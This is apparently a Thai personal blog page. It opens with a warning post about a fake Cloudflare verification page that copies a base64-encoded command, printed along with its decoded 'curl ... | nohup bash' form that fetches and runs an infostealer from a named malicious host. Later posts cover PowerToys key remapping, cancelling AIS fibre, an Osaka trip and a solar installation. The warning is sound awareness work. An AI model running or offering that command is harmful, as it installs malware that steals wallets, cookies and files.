ตัวอย่างเว็บ Phishing หลอกให้ทำ Human Verification

* การทำตามมีความเสี่ยง ถ้าไม่แน่ใจอย่าเพิ่งทำตามนะครับ

วันนี้ค้นข้อมูลเรื่องเหล็กกล่อง (ซึ่งแน่นอนว่าไม่ได้เกี่ยวอะไรกับ post นี้) จนไปเจอเว็บนี้จากผลลัพธ์ของ google, https://buildmate.co.th/product-category/square-box-steel/

ตอนเข้าไปก็ไปเจอหน้าตา Cloudflare ที่เอาไว้ verify ว่าเป็นคนจริงๆ รึเปล่า ซึ่งก็ยังดูปกติดี จน checkbox verify ก็ขึ้นภาพตามด้านล่างมา เลยเอะใจว่าทำไมเดี๋ยวนี้ตอน verify ต้องมีให้กดเปิด Terminal ขึ้นมาด้วยนะ นั่นมันออกนอก browser ไปเแล้วนี่นา ไม่ปกติมากๆเลย แล้ว cloudflare จะรู้ได้ไงนะ เทคนิคใหม่หรอ เลยลองกดปุ่ม Copy ไปตามนั้น แต่คิดละว่าไม่ใช่เว็บดีๆแน่นอน (ไม่ควรทำตามอย่างยิ่ง)

พอกดปุ่ม Copy (เพื่อจะให้ไปวางใน Terminal) ก็จะได้ข้อมูลนี้มา
echo "Y3VybCAtcyBodHRwczovL2dhbW1hLm1lc2hzb3J0ZXJpby5jb20vcGFydHkvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash

พอเห็นว่ามีการสั่ง decode ด้วย base64 แปลว่าน่าจะซ่อนอะไรไว้ ก็เลยลองเอาไป decode ต่ออีกที ทำให้ข้อมูลด้านล่างนี้มา

curl -s https://gamma.meshsorterio.com/party/index.php | nohup bash &

เอ้า curl ก็ curl …. ก็เลยตามน้ำไปอีก จนเจอว่าเว็บข้างบนนั้นให้ script ยาวยืดเลย ขอไม่แปะละกัน เพื่อความปลอดภัย โดยใน script นั้น พยายามทำหลายอย่าง เช่น

  • หาว่ามี metamask (web3 crypto wallet) install อยู่มั๊ย และ wallet อีกหลายๆตัว
  • พยายามจะฝังตัวเองลงมาเพื่อขโมย wallet signature
  • มีการพยายามหา uuid และ ขอ password ของเครื่อง (เดาว่าดูจากเครื่องแล้วว่าเป็น mac เลยส่ง script ที่ compatible กับ mac มา)
  • มีการพยายามลง chome extension ตาม list ที่ส่งมา
  • พยายามอ่าน cookie และ bookmark บนเครื่อง
  • พยายามขโมยไฟล์บนเครื่อง แล้วส่งออกไปที่ https://meshsorterio.com/api/data/receive
  • แถมยังไปดาวโหลด script อื่นๆมาอีก เรียกว่าเป็น malware แล้วแบบนี้

และดูแล้วเหมือน antivirus หลายเจ้าจะยังไม่ได้ดักไว้ https://www.virustotal.com/gui/domain/gamma.meshsorterio.com/detection

จบการรายงานแต่เพียงเท่านี้ สวัสดี

ปล. ที่จะสื่อคือ การเข้าเว็บเดี๋ยวนี้อันตรายมาก นอกจากต้อง verify ว่าเราเป็นคนจริงๆแล้วนั้น เราเองก็ต้อง verify คน verify ด้วย ว่ามันปกติรึเปล่า … เป็นต้น

สลับภาษาบน Windows ด้วย Caps Lock โดย PowerToys

คราวก่อน ได้แนะนำวิธีเปลี่ยนภาษาบน Windows ด้วยปุ่ม Caps lock ให้เหมือนกับฝั่ง Mac ด้วยโปรแกรม AutoHotkey ไป

มาคราวนี้ซื้อคอมพิวเตอร์ใหม่ ก็เลยลองดูว่ามีท่าอื่นที่ดีกว่าเดิมมั๊ย เลยเจอที่จะเอามาแชร์ในวันนี้ ที่น่าจะดีกว่าเดิมคือใช้ Microsoft PowerToys ที่สร้างโดย Microsoft เอง

ขั้นตอนใหญ่ๆคือ

  1. ดาวโหลดและติดตั้ง Microsoft PowerToys
  2. ทำการ Remap key ของ keyboard ให้ Cap Locks = Windows key + Spacebar
  • การติดตั้ง Microsoft PowerToys ทำได้หลายวิธี แต่วิธีที่ง่ายกับคนส่วนใหญ่ที่สุดคือ ติดตั้งผ่าน Microsoft Store https://apps.microsoft.com/detail/xp89dcgq3k6vld กด download และ install ให้เรียบแล้ว
หน้าตา Microsoft PowerToys บน Microsoft store

Serenade Club

เมื่อวานพอจะได้มีเวลาไป AIS เพื่อยกเลิก Internet Fibre ที่คอนโดฯ เลยได้เปิดประสบการณ์ใหม่หลายอย่างเลย

  • ศูนย์ AIS หลายที่ ถูกเปลี่ยนเป็น Serenade Club ให้บริการเฉพาะลูกค้า Serenade เท่านั้น ไม่รู้ว่าเปลี่ยนนานรึยัง แต่ก็สะดวกดี (ถ้าเราได้ใช้) รอคิวไม่นาน ข้างในหรูหราอลังการ .. ที่เจอคือที่เซ็นทรัล ลาดพร้าว
  • ยกเลิก Fibre ใช้เวลาไม่นาน ต้องเอาอุปกรณ์มาคืน และต้องใช้บัตรประชาชนตัวจริงด้วย …
  • Fibre ที่คอนโดเป็นแบบจ่ายก่อน ใช้ทีหลัง (ทำไม่เป็นแบบนั้นนะ !) และถึงแม้ว่าจะยกเลิก แต่ถ้าเลยกำหนดจ่ายมาแล้วก็ต้องจ่ายอยู่ดี (คือจ่ายเดือนสุดท้ายฟรีๆทิ้งไว้เดือนนึง ถ้าไม่ได้มายกเลิกวันสุดท้ายของรอบบิล)
  • ถ้ายกเลิก AIS Point ที่มีอยู่จะหายไป Burn point ได้สองทางคือ เอาเป็นส่วนลด accessories ในร้าน ที่ก็ไม่ได้มีให้เลือกเยอะมาก กับเอาไปกดซื้อกาแฟ Starbucks เป็นเครื่องอัตโนมัติในศูนย์บริการนั่นแหล่ะ แก้วละ 60 คะแนน ที่เหลือก็ปล่อยทิ้งไป 😂
  • ถัดมา ถ้ารวมรอบบิล (Fibre และ โทรศัพท์มือถือ) แต้มที่มีอยู่ก็จะหายไปเช่นกัน 😂
  • (อันนี้นานแล้ว) คือ ถ้าแพคเกจอินเตอร์เน็ตของมือถือเรามี multi-sim จะทำให้ใช้กับ promotion ที่เป็นพวก ใช้ data เต็มสปีดเต็มแล้วลดความเร็วเหลือต่ำ ๆ ไม่ได้ จะใช้ได้แบบเต็มสปีดหมดแล้วหยุดเลยเท่านั้น รอบนี้ก็เลยยกเลิก multi-sim ทิ้งไป
  • เซ็นทรัลลาดพร้าว จอดรถฟรี ชม.เดียว ประทับตราจอดรถขั้นต่ำ ยอดสองพันบาท แพงขนาดนี้ตั้งแต่เมื่อไหร่นะ

ปล. ช่วงนี้พอจะว่างขึ้น เลยมาลองนั่งปั่นบล็อกเรื่องง่ายๆหน่อย

Japan 2025

เพิ่งกลับมาจากญี่ปุ่น รอบนี้ต่างจากรอบก่อนๆคือพาลูกไปด้วย (จริงๆควรเขียนเรื่อง New Zealand ด้วย ที่เป็นทริปต่างประเทศอันแรก แต่ขอดองไว้ก่อน)

รอบไปนี้ไป Osaka (โอซากา) แค่เมืองเดียวเลย พักที่เดียวยาวๆ จะได้ไม่ต้องลำบากย้ายที่ โดยเฉพาะการพาลูกไปด้วย สรุปสั้นๆเก็บไว้อ่านหน่อยนึง

เข้า/ออกสนามบิน

  • นั่งเครื่องบินไปลงโอซากา (KIX) แถวตม.คือยาวมาก (ชั่วโมงกว่าๆ เฉพาะต่อแถวตม.) ควรลงทะเบียนเว็บ Visit Japan ไปให้เรียบร้อย เพื่อผ่านตม.ง่ายหน่อย แบบไม่ต้องไปกรอกกระดาษหน้างาน
  • ขาออกจากสนามบินมีสองสามทางเลือก ถ้าเลือกรถไฟ ตอนซื้อตั๋วอาจจะต้องดูดีๆ เพราะขบวนด่วนพิเศษก็ต้องซื้อตั๋วด่วนพิเศษ (Rapid express) ซื้อผิดก็อาจจะได้รถหวานเย็น (Express ธรรมดา) ที่จอดเยอะกว่าหน่อย ช้ากว่าซัก 15-20 นาที จริงๆรถไฟก็มีสองอันอีกคือ JR หรือ Nankai
  • อีกทางเลือกคือ Airport Limousine Bus ที่สะดวกเหมือนกัน ไปถึงใกล้ที่พักเลยด้วย (แถว Namba) แต่น่าเสียดายว่ารถหมดแค่ 2 ทุ่มครึ่ง กว่าจะผ่านตม.ออกมาได้ก็ไม่ทันแล้ว
  • ถ้าถือบัตร IC (Suica / ICOCA) ไปก่อนได้ ชีวิตก็จะง่ายขึ้นหน่อยนึง เพราะซื้อตั๋วรถไฟที่ตู้ได้เลย
  • ขากลับมาขึ้นเครื่องบิน รอบนี้ใช้ Airport Limousine Bus ขึ้นที่ Osaka City Air Terminal (OCAT) ซื้อตั๋วก่อนขึ้นได้เลยที่ชั้น 2 ผู้ใหญ่ 1300 เยน เด็กจำไม่ได้ เพราะไม่ได้ซื้อ ตั๋วขายผ่านเครื่อง ที่รับแค่เหรียญกับแบงค์เท่านั้น ตอนขึ้นรถคนขับจะถาม Terminal แล้วติด Tag กระเป๋า (ระบุ Terminal) ให้ แล้วเก็บใต้ท้องรถ สบายกว่าไปต่อรถไฟเยอะเลย นอนๆมาเกือบชม.ก็ถึงเลย

ว่าด้วยเรื่อง Solar cell

ครบรอบหนึ่งปี กับการติด Solar cell เลยมาแชร์ผลการดำเนินงาน

รายละเอียดการติดตั้ง

  • ขนาด 4.64 kW บนไฟ 1 Phase ติดตั้งแบบ on-grid
  • ระบบ Micro Inverter ของ Enphase
  • แผงโซล่าเซลล์ JINKO 580 watts จำนวน 8 แผง
  • ติดตั้งบนหลังคาบ้านด้านเดียว หันหน้าไปทางทิศใต้
  • ไม่มีแบตเตอรี่เก็บไฟ
  • บริษัทที่ติดตั้งทำเรื่องขายไฟคืนการไฟฟ้าฯให้
Scroll to top